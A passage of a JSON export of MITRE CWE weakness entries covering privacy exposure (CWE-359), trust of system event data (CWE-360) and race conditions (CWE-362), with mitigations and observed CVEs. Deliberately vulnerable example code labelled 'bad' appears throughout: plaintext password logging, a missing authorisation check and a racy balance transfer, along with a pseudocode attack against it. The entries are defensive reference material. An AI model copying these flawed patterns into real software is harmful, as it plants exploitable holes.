certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1407"},{"Reference":"CVE-2005-0198","Description":"Logic error prevents some required conditions from being enforced during Challenge-Response Authentication Mechanism with MD5 (CRAM-MD5).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0198"},{"Reference":"CVE-2004-2163","Description":"Shared secret not verified in a RADIUS response packet, allowing authentication bypass by spoofing server replies.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2163"},{"Reference":"CVE-2005-2181","Description":"Insufficient verification in VoIP implementation, in violation of standard, allows spoofed messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2181"},{"Reference":"CVE-2005-2182","Description":"Insufficient verification in VoIP implementation, in violation of standard, allows spoofed messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2182"},{"Reference":"CVE-2005-2298","Description":"Security check not applied to all components, allowing bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2298"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improperly Implemented Security Check for Standard"}},"Notes":{"Note":{"#text":"This is a \\"missing step\\" error on the product side, which can overlap weaknesses such as insufficient verification and spoofing. It is frequently found in cryptographic and authentication errors. It is sometimes resultant.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"359":{"attr":{"@_ID":"359","@_Name":"Exposure of Private Personal Information to an Unauthorized Actor","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not properly prevent a person\'s private, personal information from being accessed by actors who either (1) are not explicitly authorized to access the information or (2) do not have the implicit consent of the person about whom the information is collected.","Extended_Description":{"xhtml:p":["There are many types of sensitive information that products must protect from attackers, including system data, communications, configuration, business secrets, intellectual property, and an individual\'s personal (private) information. Private personal information may include a password, phone number, geographic location, personal messages, credit card number, etc. Private information is important to consider whether the person is a user of the product, or part of a data set that is processed by the product. An exposure of private information does not necessarily prevent the product from working properly, and in fact the exposure might be intended by the developer, e.g. as part of data sharing with other organizations. However, the exposure of personal private information can still be undesirable or explicitly prohibited by law or regulation.","Some types of private information include:","Some of this information may be characterized as PII (Personally Identifiable Information), Protected Health Information (PHI), etc. Categories of private information may overlap or vary based on the intended usage or the policies and practices of a particular industry.","Sometimes data that is not labeled as private can have a privacy implication in a different context. For example, student identification numbers are usually not considered private because there is no explicit and publicly-available mapping to an individual student\'s personal information. However, if a school generates identification numbers based on student social security numbers, then the identification numbers should be considered private."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Government identifiers, such as Social Security Numbers","Contact information, such as home addresses and telephone numbers","Geographic location - where the user is (or was)","Employment history","Financial data - such as credit card numbers, salary, bank accounts, and debts","Pictures, video, or audio","Behavioral patterns - such as web surfing history, when certain activities are performed, etc.","Relationships (and types of relationships) with others - family, friends, contacts, etc.","Communications - e-mail addresses, private messages, text messages, chat logs, etc.","Health - medical conditions, insurance status, prescription records","Account passwords and other credentials"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Privacy violation"},{"Term":"Privacy leak"},{"Term":"Privacy leakage"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Detection_Methods":{"Detection_Method":{"Method":"Architecture or Design Review","Description":{"xhtml:p":"Private personal data can enter a program in a variety of ways:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["Directly from the user in the form of a password or personal information","Accessed from a database or other data store by the application","Indirectly from a partner or other third party"]},"xhtml:p":"If the data is written to an external location - such as the console, file system, or network - a privacy violation may occur."}},"Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":{"xhtml:p":"Identify and consult all relevant regulations for personal privacy. An organization may be required to comply with certain federal and state regulations, depending on its location, the type of business it conducts, and the nature of any private data it handles. Regulations may include Safe Harbor Privacy Framework [REF-340], Gramm-Leach Bliley Act (GLBA) [REF-341], Health Insurance Portability and Accountability Act (HIPAA) [REF-342], General Data Protection Regulation (GDPR) [REF-1047], California Consumer Privacy Act (CCPA) [REF-1048], and others."}},{"Phase":"Architecture and Design","Description":{"xhtml:p":"Carefully evaluate how secure design may interfere with privacy, and vice versa. Security and privacy concerns often seem to compete with each other. From a security perspective, all important operations should be recorded so that any anomalous activity can later be identified. However, when private data is involved, this practice can in fact create risk. Although there are many ways in which private data can be handled unsafely, a common risk stems from misplaced trust. Programmers often trust the operating environment in which a program runs, and therefore believe that it is acceptable store private information on the file system, in the registry, or in other locally-controlled resources. However, even if access to certain resources is restricted, this does not guarantee that the individuals who do have access can be trusted."}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code contains a logging statement that tracks the contents of records added to a database by storing them in a log file. Among other values that are stored, the getPassword() function returns the user-supplied plaintext password associated with the account.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"pass = GetPassword();...dbmsLog.WriteLine(id + \\":\\" + pass + \\":\\" + type + \\":\\" + tstamp);","xhtml:br":["",""]}},"Body_Text":"The code in the example above logs a plaintext password to the filesystem. Although many developers trust the filesystem as a safe storage location for data, it should not be trusted implicitly, particularly when privacy is a concern."},{"attr":{"@_Demonstrative_Example_ID":"DX-111"},"Intro_Text":"This code uses location to determine the user\'s current US State location.","Body_Text":["First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application\'s manifest.xml:","During execution, a call to getLastLocation() will return a location based on the application\'s location permissions. In this case the application has permission for the most accurate location possible:","While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":"<uses-permission android:name=\\"android.permission.ACCESS_FINE_LOCATION\\"/>"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation);","xhtml:br":["","","",""]}}]},{"Intro_Text":"In 2004, an employee at AOL sold approximately 92 million private customer e-mail addresses to a spammer marketing an offshore gambling web site [REF-338]. In response to such high-profile exploits, the collection and management of private data is becoming increasingly regulated."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Privacy Violation"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO13-J","Entry_Name":"Do not log sensitive information outside a trust boundary"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"464"}},{"attr":{"@_CAPEC_ID":"467"}},{"attr":{"@_CAPEC_ID":"508"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-338"}},{"attr":{"@_External_Reference_ID":"REF-339"}},{"attr":{"@_External_Reference_ID":"REF-340"}},{"attr":{"@_External_Reference_ID":"REF-341"}},{"attr":{"@_External_Reference_ID":"REF-342"}},{"attr":{"@_External_Reference_ID":"REF-343"}},{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-172"}},{"attr":{"@_External_Reference_ID":"REF-1047"}},{"attr":{"@_External_Reference_ID":"REF-1048"}}]},"Notes":{"Note":{"#text":"This entry overlaps many other entries that are not organized around the kind of sensitive information that is exposed. However, because privacy is treated with such importance due to regulations and other factors, and it may be useful for weakness-finding tools to highlight capabilities that detect personal private information instead of system information, it is not clear whether - and how - this entry should be deprecated.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, Name, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Previous_Entry_Name":[{"#text":"Privacy Violation","attr":{"@_Date":"2014-02-18"}},{"#text":"Exposure of Private Information (\'Privacy Violation\')","attr":{"@_Date":"2020-02-24"}}]}},"360":{"attr":{"@_ID":"360","@_Name":"Trust of System Event Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Security based on event locations are insecure and can be spoofed.","Extended_Description":"Events are a messaging system which may provide control data to programs listening for events. Events often do not have any type of authentication framework to allow them to be verified from a trusted source. Any application, in Windows, on a given desktop can send a message to any window on the same desktop. There is no authentication framework for these messages. Therefore, any message can be used to manipulate any process on the desktop if the process does not check the validity and safeness of those messages.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands"],"Note":"If one trusts the system-event information and executes commands based on it, one could potentially take actions based on a spoofed identity."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Never trust or rely any of the information in an Event for security."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example code prints out secret information when an authorized user activates a button:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void actionPerformed(ActionEvent e) {}","xhtml:div":{"#text":"if (e.getSource() == button) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"print out secret information\\");","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"This code does not attempt to prevent unauthorized users from activating the button. Even if the button is rendered non-functional to unauthorized users in the application UI, an attacker can easily send a false button press event to the application window and expose the secret information."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Trust of system event data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP29","Entry_Name":"Faulty endpoint authentication"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"362":{"attr":{"@_ID":"362","@_Name":"Concurrent Execution using Shared Resource with Improper Synchronization (\'Race Condition\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently.","Extended_Description":{"xhtml:p":["This can have security implications when the expected synchronization is in security-critical code, such as recording whether a user is authenticated or modifying important state information that should not be influenced by an outsider.","A race condition occurs within concurrent environments, and is effectively a property of a code sequence. Depending on the context, a code sequence may be in the form of a function call, a small number of instructions, a series of program invocations, etc.","A race condition violates these properties, which are closely related:","A race condition exists when an \\"interfering code sequence\\" can still access the shared resource, violating exclusivity. Programmers may assume that certain code sequences execute too quickly to be affected by an interfering code sequence; when they are not, this violates atomicity. For example, the single \\"x++\\" statement may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read (the original value of x), followed by a computation (x+1), followed by a write (save the result to x).","The interfering code sequence could be \\"trusted\\" or \\"untrusted.\\" A trusted interfering code sequence occurs within the program; it cannot be modified by the attacker, and it can only be invoked indirectly. An untrusted interfering code sequence can be authored directly by the attacker, and typically it is external to the vulnerable program."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Exclusivity - the code sequence is given exclusive access to the shared resource, i.e., no other code sequence can modify properties of the shared resource before the original sequence has completed execution.","Atomicity - the code sequence is behaviorally atomic, i.e., no other thread or process can concurrently execute the same sequence of instructions (or a subset) against the same resource."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"Java","@_Prevalence":"Sometimes"}}],"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"When a race condition makes it possible to bypass a resource cleanup routine or trigger multiple initialization routines, it may lead to resource exhaustion (CWE-400)."},{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Instability"],"Note":"When a race condition allows multiple control flows to access a resource simultaneously, it might lead the program(s) into unexpected states, possibly resulting in a crash."},{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Read Application Data"],"Note":"When a race condition is combined with predictable resource names and loose permissions, it may be possible for an attacker to overwrite or access confidential data (CWE-59)."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"Black box methods may be able to identify evidence of race conditions via methods such as multiple simultaneous connections, which may cause the software to become instable or crash. However, race conditions with very narrow timing windows would not be detectable."},{"Method":"White Box","Description":"Common idioms are detectable in white box analysis, such as time-of-check-time-of-use (TOCTOU) file operations (CWE-367), or double-checked locking (CWE-609)."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Race conditions may be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior.","Insert breakpoints or delays in between relevant code statements to artificially expand the race window so that it will be easier to detect."]},"Effectiveness":"Moderate"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Framework-based Fuzzer"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"In languages that support it, use synchronization primitives. Only wrap these around critical code to minimize the impact on performance."},{"Phase":"Architecture and Design","Description":"Use thread-safe capabilities such as the data access abstraction in Spring."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Minimize the usage of shared resources in order to remove as much complexity as possible from the control flow and to reduce the likelihood of unexpected conditions occurring.","Additionally, this will minimize the amount of synchronization necessary and may even help to reduce the likelihood of a denial of service where an attacker may be able to repeatedly trigger a critical section (CWE-400)."]}},{"Phase":"Implementation","Description":"When using multithreading and operating on shared variables, only use thread-safe functions."},{"Phase":"Implementation","Description":"Use atomic operations on shared variables. Be wary of innocent-looking constructs such as \\"x++\\". This may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read, followed by a computation, followed by a write."},{"Phase":"Implementation","Description":"Use a mutex if available, but be sure to avoid related weaknesses such as CWE-412."},{"Phase":"Implementation","Description":"Avoid double-checked locking (CWE-609) and other implementation errors that arise when trying to avoid the overhead of synchronization."},{"Phase":"Implementation","Description":"Disable interrupts or signals over critical parts of the code, but also make sure that the code does not go into a large or infinite loop."},{"Phase":"Implementation","Description":"Use the volatile type modifier for critical variables to avoid unexpected compiler optimization or reordering. This does not necessarily solve the synchronization problem, but it can help."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code could be used in an e-commerce application that supports transfers between accounts. It takes the total amount of the transfer, sends it to the new account, and deducts the amount from the original account.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$transfer_amount = GetTransferAmount();$balance = GetBalanceFromDatabase();if ($transfer_amount < 0) {}$newbalance = $balance - $transfer_amount;if (($balance - $transfer_amount) < 0) {}SendNewBalanceToDatabase($newbalance);NotifyUser(\\"Transfer of $transfer_amount succeeded.\\");NotifyUser(\\"New balance: $newbalance\\");","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"FatalError(\\"Bad Transfer Amount\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"FatalError(\\"Insufficient Funds\\");","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack","@_Language":"Other"},"xhtml:div":{"#text":"In the following pseudocode, the attacker makes two simultaneous calls of the program, CALLER-1 and CALLER-2. Both callers are for the same user account.CALLER-1 (the attacker) is associated with PROGRAM-1 (the instance that handles CALLER-1). CALLER-2 is associated with PROGRAM-2.CALLER-1 makes a transfer request of 80.00.PROGRAM-1 calls GetBalanceFromDatabase and sets $balance to 100.00PROGRAM-1 calculates $newbalance as 20.00, then calls SendNewBalanceToDatabase().Due to high server load, the PROGRAM-1 call to SendNewBalanceToDatabase() encounters a delay.CALLER-2 makes a transfer request of 1.00.PROGRAM-2 calls GetBalanceFromDatabase() and sets $balance to 100.00. This happens because the previous PROGRAM-1 request was not processed yet.PROGRAM-2 determines the new balance as 99.00.After the initial delay, PROGRAM-1 commits its balance to the database, setting it to 20.00.PROGRAM-2 sends a request to update the database, setting the balance to 99.00","xhtml:br":["","","","","","","","","",""]}}],"Body_Text":["A race condition could occur between the calls to GetBalanceFromDatabase() and SendNewBalanceToDatabase().","Suppose the balance is initially 100.00. An attack could be constructed as follows:","At this stage, the attacker should have a balance of 19.00 (due to 81.00 worth of transfers), but the balance is 99.00, as recorded in the database.","To prevent this weakness, the programmer has several options, including using a lock to prevent multiple simultaneous requests to the web application, or using a synchronization mechanism that includes all the code between GetBalanceFromDatabase() and SendNewBalanceToDatabase()."]},{"attr":{"@_Demonstrative_Example_ID":"DX-24"},"Intro_Text":"The following function attempts to acquire a lock in order to perform operations on a shared resource.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pthread_mutex_lock(mutex);pthread_mutex_unlock(mutex);","xhtml:br":["","","","",""],"xhtml:i":"/* access shared resource */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result;result = pthread_mutex_lock(mutex);if (0 != result)return pthread_mutex_unlock(mutex);","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return result;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* access shared resource */"}}}}],"Body_Text":["However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.","In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels."]},{"attr":{"@_Demonstrative_Example_ID":"DX-132"},"Intro_Text":"Suppose a processor\'s Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of \\"accessible\\" memory. Any time this accessible range changes (as per the processor\'s boot status), the main MMU sends an update message to all the shadow MMUs.","Body_Text":"Suppose the interconnect fabric does not prioritize such \\"update\\" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-18827","Description":"chain: JTAG interface is not disabled (CWE-1191) during ROM code execution, introducing a race condition (CWE-362) to extract encryption 